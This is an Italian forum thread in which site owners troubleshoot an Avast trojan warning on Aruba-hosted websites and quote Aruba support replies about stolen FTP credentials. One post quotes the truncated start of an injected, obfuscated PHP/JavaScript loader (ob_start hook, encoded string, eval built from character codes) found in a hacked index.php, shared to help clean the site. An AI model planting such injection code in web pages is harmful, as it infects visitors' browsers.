Aiutamici Forum
Benvenuto Ospite Cerca | Topic Attivi | Utenti | | Log In | Registra

Un trojan nel dominio di aruba Opzioni
alicante
Inviato: Sunday, June 13, 2010 9:14:42 PM

Rank: AiutAmico

Iscritto dal : 12/19/2008
Posts: 345
Salve a tutti,
scrivo perché nel sito di mio padre ospitato da Aruba c'è un trojan,
praticamente quando mi ci reco compare il sito per un istante, poi la pagina scompare e avast avverte che ha individuato un cavallo di troia.
Questi sono i dati che avast presenta:

"CAVALLO DI TROIA BLOCCATO

Oggetto: http://www.miosito.eu/
Infezione: HTML:IFrame-NU [Trj]
Azione: Connessione fallita
Processo: C:\Program Files (x86)\Mozilla Firefox\firefox.exe

La minaccia è stata rilevata e bloccata quando il file è stato scaricato dal web"


Mio padre mi ha accennato di un avvenimento recente in cui Aruba proponeva un servizio di antivirus pagando un supplemento e mio padre ha pensato che, diciamo, il virus nel suo sito non potrebbe essere del tutto dovuto a entità esterne,
dato che certe cose capitano spesso in Italia.

Ho dato un'occhiata ai file nel server e non mi pare che ci sia niente di strano.

Avete soluzioni?

Non metto il link al sito per ragioni di sicurezza,

cordiali saluti.
Sponsor
Inviato: Sunday, June 13, 2010 9:14:42 PM

 
ecofive
Inviato: Sunday, June 13, 2010 9:27:24 PM

Rank: AiutAmico

Iscritto dal : 6/20/2008
Posts: 7,111
Hai segnalato il fatto ad Aruba?

Ciao.
alicante
Inviato: Sunday, June 13, 2010 10:00:15 PM

Rank: AiutAmico

Iscritto dal : 12/19/2008
Posts: 345
Mi sono iscritto al forum di Aruba ma sto ancora attendendo che confermino la registrazione.
Colui che gestisce il sito di mio padre ha prezzi alti anche per lavori non molto impegantivi, quindi volevamo evitare se possibile di avvertire lui.
Ho deato un'occhiata su aruba.it vedrò di chiamare domani.
Grazie,
ciao ecofive.
ecofive
Inviato: Sunday, June 13, 2010 11:00:42 PM

Rank: AiutAmico

Iscritto dal : 6/20/2008
Posts: 7,111
alicante
Inviato: Sunday, June 13, 2010 11:11:36 PM

Rank: AiutAmico

Iscritto dal : 12/19/2008
Posts: 345
Ecofive, non mi occupo io del sito di mio padre invero non so individuare se nella pagine del sito vi siano parti malevole del codice,
ma del link che mi hai dato una parte può interessarmi:
ovvero la modifica della password per il login: qui,
mi chiedo però: se il trojan è all'interno del sito ovvero nel server, la modifica della password associata al login non dovrebbe essere sufficiente, andrebbero rimossi i vecchi file e mettere quelli nuovi, o no?.
Comunque domani chiamo Aruba sono dispiaciuto per mio padre che ne sta avendo una dietro l'altra.

Nel frattempo ti ringrazio e ti auguro una serena notte.
ecofive
Inviato: Sunday, June 13, 2010 11:19:49 PM

Rank: AiutAmico

Iscritto dal : 6/20/2008
Posts: 7,111
Probabilmente dovrai cancellare i file vecchi e rimandare in rete le copie, sicuramente affidabili, dei file.
Tanti auguri e buon riposo.

Ciao.
alicante
Inviato: Sunday, June 13, 2010 11:23:24 PM

Rank: AiutAmico

Iscritto dal : 12/19/2008
Posts: 345
Va bene,
domani per prima cosa faccio modificare la password di mio padre su aruba dallo stesso,
poi chiamo Aruba e chiedo indicazioni,
così non ho il dubbio di star facendo lavoro inutile.
Vi farò sapere come avrò risolto,
sperando che quest'ottimismo non venga guastato,
good bye and a good night,
A.
paoletto52
Inviato: Monday, June 14, 2010 1:19:22 AM
Rank: Newbie

Iscritto dal : 6/14/2010
Posts: 8
Perfetto. Mal comune mezzo gaudio. Oggi pomeriggio stessa cosa. Hosting Linux su Aruba. Siccome uso Linux, testando ogni tanto su Win ho visto che Avast mi da lo stesso messaggio. Scritto ticket ad Aruba, aspetto risposta. Ti faccio sapere. Intanto ho usato unmaskparasites al sito http://www.unmaskparasites.com/ dove puoi testare il sito e mi dice che è tutto OK. Con Google su http://www.google.com/safebrowsing/diagnostic?site=<www.nomesito> ricevo tutto a posto. Ho controllato sul codice della pagina iniziale ed ho solo un Iframe di un bottone per Facebook ma non dovrebbe essere quello perchè ce l'ho da tempo e poi levandolo il fatto rimane. Non so che dire, aspettiamo e teniamoci in contatto Pray
alicante
Inviato: Monday, June 14, 2010 10:53:13 AM

Rank: AiutAmico

Iscritto dal : 12/19/2008
Posts: 345
Ho appena chiamato Aruba, mi è stato detto di aprire un ticket, come hai fatto tu. Ora lo apro,
fammi sapere il progresso della tua situazione dato che hai aperto un ticket prima di me,
ti ringrazio,
ciao.
ecofive
Inviato: Monday, June 14, 2010 11:04:58 AM

Rank: AiutAmico

Iscritto dal : 6/20/2008
Posts: 7,111
Guarda che non ho aperto alcun ticket ...

Ciao.
alicante
Inviato: Monday, June 14, 2010 11:14:24 AM

Rank: AiutAmico

Iscritto dal : 12/19/2008
Posts: 345
Ecofive, io mi riferivo a paoletto52, ciao.
ecofive
Inviato: Monday, June 14, 2010 11:33:55 AM

Rank: AiutAmico

Iscritto dal : 6/20/2008
Posts: 7,111
Scusa Alicante, ho perso un post (vecchiaia galoppante).

Ciao.
alicante
Inviato: Monday, June 14, 2010 12:12:31 PM

Rank: AiutAmico

Iscritto dal : 12/19/2008
Posts: 345
Figurati,
ciao.
r16
Inviato: Monday, June 14, 2010 12:23:21 PM
Rank: AiutAmico

Iscritto dal : 8/7/2007
Posts: 11,016
Ciao a tutti.
Non sono pratico in materia di siti, ma vorrei chiedere un'informazione:
Non ci sono alternative a questo Aruba?
Circolano voci, che il suo server, sia un colabrodo.
alicante
Inviato: Monday, June 14, 2010 12:31:24 PM

Rank: AiutAmico

Iscritto dal : 12/19/2008
Posts: 345
Ciao r16, il mio sito è ospitato da Dominio fai da te (Dfdt), i prezzi convengono rispetto ad Aruba ma non è servito come quest'ultimo, comunque io non ho avuto problemi e lo uso da circa due anni.

http://www.dominiofaidate.com/it/Default.aspx

Ciao
r16
Inviato: Monday, June 14, 2010 1:01:38 PM
Rank: AiutAmico

Iscritto dal : 8/7/2007
Posts: 11,016
alicante ha scritto:
i prezzi convengono rispetto ad Aruba ma non è servito come quest'ultimo

Pensa quanto "ignorante" sono......Sick
Non sapevo nemmeno che si dovesse pagare.Whistle
Ciao.
alicante
Inviato: Monday, June 14, 2010 1:09:55 PM

Rank: AiutAmico

Iscritto dal : 12/19/2008
Posts: 345
Beh, ora lo sai..

Scusate ma non so a chi chiedere un'informazione che i più dovrebbero sapere.
L'informazione non c'entra niente con l'informatica per questo chiedo venia ad Alfonso dell'apertura di questa piccola parentesi.
Sto scrivendo un sonetto su un pittore che è stimato ma che è sempre insoddisfatto perché sebbene abbia un modesto talento permane infelice a causa dell'assenza di colei che ama,
così alla fine distrugge tutte le sue opere che considera "bovariste" e in certo qual senso insincere ecc.
Dovrei fare una metafora un po' disdicevole per le poesie in cui paragono il lavoro del pittore che sta chino sulla tela nel suo studio a quello di colui che puliva i pozzi neri,
ma non ricordo come si chiama questo mestiere.
Ho cercato su internet e sono giunto al mestiere di "latrinaio" ovvero il custode dei bagni pubblici ma non va bene,
prima c'erano degli uomini che praticavano questo mestiere che ora sono stati sostituiti dagli spurgatori,
lo so perché da bambino ho visto un film in cui un bambino aveva il padre che faceva quel lavoro,
il film era molto bello,
se sapete anche il titolo del film meglio!.

Ciao!.


Edit:
Tornando al problema del trojan nel sito informo che ho ricevuto una risposta al ticket, la risposta è la seguente:

Gentile Cliente,

Si assicuri di non aver richiami a pagine esterne al sito causa di rallentamenti e di eventuali virus (un esempio sono i siti di statistiche come Superstat o ShinyStat

Si assicuri inoltre di non avere nel sito dei Form non "protetti" che possano essere usati sempre da terzi per accedere al suo spazio web, ecc. ecc..

Al fine di evitare in futuro il ripetersi di tali eventi la invito a consultare periodicamente siti di sicurezza quali

www.secunia.com
www.securityfocus.com

dove vengono rese note le nuove vulnerabilità scoperte per script

Per una sua maggiore sicurezza la invitiamo ad effettuare un cambio della password di gestione inerente la login@aruba.it accedendo presso il nostro sito on line all’indirizzo

http://hosting.aruba.it/areaclienti/CambioPassword/CambioPassword_Richiesta.asp

La nuova Password deve mantenere i seguenti criteri:
- lunghezza compresa fra 8 e 13 caratteri;
- formato alfanumerico (deve quindi contenere sia lettere che numeri)
- diversa dalle password utilizzate in precedenza

Oltre a quanto già indicatole, le consigliamo caldamente anche di effettuare un controllo del suo PC per assicurarsi che non vi siano Trojan, Keylogger, Malware i quali, una volta che ha effettuato il cambio della password, possono "rubarle" i dati di gestione del suo dominio ed altri dati sensibili presenti nel suo PC, causando spiacevoli situazioni.

Resto a disposizione per eventuali chiarimenti.

Distinti saluti.


alla quale <<risposta ho risposto>>:

Gentile Aruba,
la ringrazio per la cortese risposta che ho recepito con successo esclusa la parte che dice: "Si assicuri di non aver richiami a pagine esterne al sito causa di rallentamenti e di eventuali virus (un esempio sono i siti di statistiche come Superstat o ShinyStat":
nel sito che mi da problemi, infatti è presente un contatore ShinyStat,
ma non ho ben capito se voi mi stiate suggerendo di toglierlo,
in attesa di chiarimenti porgo i miei cordiali saluti.


inoltre aggiungo che nel sito in questione non sono presenti form,

voi che mi dite?
paoletto52
Inviato: Monday, June 14, 2010 5:09:06 PM
Rank: Newbie

Iscritto dal : 6/14/2010
Posts: 8
Amico Alicante, ecco i fatti dopo circa mezza giornata di smanettamenti. Inviato il ticket ed ovviamente stessa risposta da parte di Aruba. Però avevo una traccia in più. Infatti avevo ieri sera chiesto aiuto al sito www.unmaskparasites.com/ e molto gentilmente ho trovato una risposta in cui mi diceva che nel file index.php risultava uno script iniziale sospetto. Il testo dello script era infatti lunghissimo e pieno di strani numeri, inizia con <?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">var ez=window;function asd(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}var sdkajsnd=String.fromCharCode(101,118,97)+"l";function fds(){return asd($a);}var $a="Z64zZ3dZ22Z2566uncZ2574iZ256fnZ2520Z2564wZ2528t, ecc, ecc. Il bello che il commento allo script lo definisce un importante contributi all'update!
Per avere empiricamente una controprova ho scaricato l'intero contenuto della cartelle joomla sul PC e ho fatto testare la cartella ad AVAST. Infatti AVAST considerava index.php la sola origine del malware. Bene, ho cancellato decisamente il blocco dello script, testato il file depurato con AVAST e tutto OK. A questo punto ho sostituito il file index.php sul server. Tuttavia quella 'security update' nello script + uno strano messaggio in un tentativo d'accesso al sito offline tramite login e pwd dell'amministratore mi hanno fatto pensare che l'origine del problema potrebbe essere stata l'estensione aggiunta a Joomla del componente SecurityImages che avevo fatto alcuni giorni fa per avere un controllo sul riempimento delle form. Insomma, deinstallato SecurityImages. Ora non so bene cosa sia successo, chi ha installato cosa. Probabilmente AVAST non digerisce quello script che magari non è affatto un malware. D'altra parte il codice di quello script è francamente pauroso e non sembra per niente tranquillo. Alla fine ho tolto anche SecurityImages. Del resto, mi sembra strano che ci sia stato un problema analogo nello stesso tempo su due siti e magari tu non usi SecurityImages. Quindi potrebbe trattarsi di un'intrusione. Se ti ritrovi lo stesso script senza SecurityImages questa ipotesi prenderebbe più corpo.
Ora sembra funzionare di nuovo. Cmq vado a cambiare login e pwd non si sa mai. Fammi sapere se ti è stato utile.

Anxious
alicante
Inviato: Monday, June 14, 2010 6:12:13 PM

Rank: AiutAmico

Iscritto dal : 12/19/2008
Posts: 345
Gentile paoletto52, grazie per il tuo intervento.
Mi è da poco giunta l'ultima risposta di Aruba che riporto qui fedelmente:

"Gentile cliente,
relativamente al problema riscontrato, questo era causato da un js richiamato nella pagina index, che Le dava problemi; rimosso dalla pagina, il problema è stato risolto.
Come suggerito dal collega in precedenza, è sempre bene evitare di richiamare siti esterni al proprio, per evitare problemi di tale natura o similari.
Tuttavia, per questo tipo di casistica, il problema segnalatoci è noto, ed è ricercabile nell'acquisizione delle credenziali FTP direttamente sui pc dei clienti da parte di terzi (sostanzialmente quindi dal furto dei parametri ftp dalla postazione dell'utente che gestisce lo spazio web o dalla postazione che mantiene le credenziali del dominio), non un attacco specifico contro di noi o i nostri server. E' per questo indipendente dal fornitore di servizio usato.
Dato che il problema e' noto stiamo rilasciando un comunicato in merito. (in allegato una bozza di quanto verrà pubblicato).

Per una Sua maggiore sicurezza La invito caldamente ad eseguire con cadenza trimestrale (o comunque regolarmente) un cambio della password associata alla Sua Login:

https://hosting.aruba.it/areaclienti/CambioPassword/CambioPassword_Richiesta.asp

assicurandosi ovviamente di esserne il solo conoscitore.
La invito inoltre a verificare il codice da Lei utilizzato per le pagine web, relativamente ad eventuali implementazioni di script di terze parti (es. Form Upload etc), ed assicurandosi sempre di aggiornare gli stessi attraverso apposite patch o fix.

Riepilogando quindi, si deve assicurare di non avere, sulla sua postazione o dalle postazioni dalle quali esegue le pubblicazioni, eventuali malware, virus, spyware che possano interferire con la corretta gestione del suo dominio e delle sue credenziali; utilizzi qundi appositi applicativi per monitorare le sue postazioni, quali ad esempio:

http://www.novirusthanks.org

(lo stesso potrà generare un "report", me lo alleghi eventualmente in risposta a questo ticket)

Può eseguire delle prove con gli antivirus contenuti alla pagina

http://en.wikipedia.org/wiki/List_of_antivirus_software

Nel caso avesse tale infezione, cambi nuovamente la password di gestione del dominio. Questo dopo e non prima aver debellato le sue postazioni.

La pulizia delle pagine deve avvenire da parte del cliente, che si deve basare sui consigli precedentemente forniti. Ciò perché interverrebbe in tempi più celeri di quanto non potrebbe fare lo Staff in orario d'ufficio.

Le confermo il nostro totale impegno al fine di ridurre al minimo possibile (se i clienti pubblicano applicazioni vulnerabili, Aruba può fare tempestivamente ben poco) o addirittura cercare di debellare tale fastidioso, ripetitivo, dannoso problema".


comunque il sito non è stato realizzato con Joomla ed è qui,
continuo però a non comprendere queste parole:

"Come suggerito dal collega in precedenza, è sempre bene evitare di richiamare siti esterni al proprio, per evitare problemi di tale natura o similari".


qualcuno me lo spiega?.

Utenti presenti in questo topic
Guest


Salta al Forum
Aggiunta nuovi Topic disabilitata in questo forum.
Risposte disabilitate in questo forum.
Eliminazione tuoi Post disabilitata in questo forum.
Modifica dei tuoi post disabilitata in questo forum.
Creazione Sondaggi disabilitata in questo forum.
Voto ai sondaggi disabilitato in questo forum.

Main Forum RSS : RSS

Aiutamici Theme
Powered by Yet Another Forum.net versione 1.9.1.8 (NET v2.0) - 3/29/2008
Copyright © 2003-2008 Yet Another Forum.net. All rights reserved.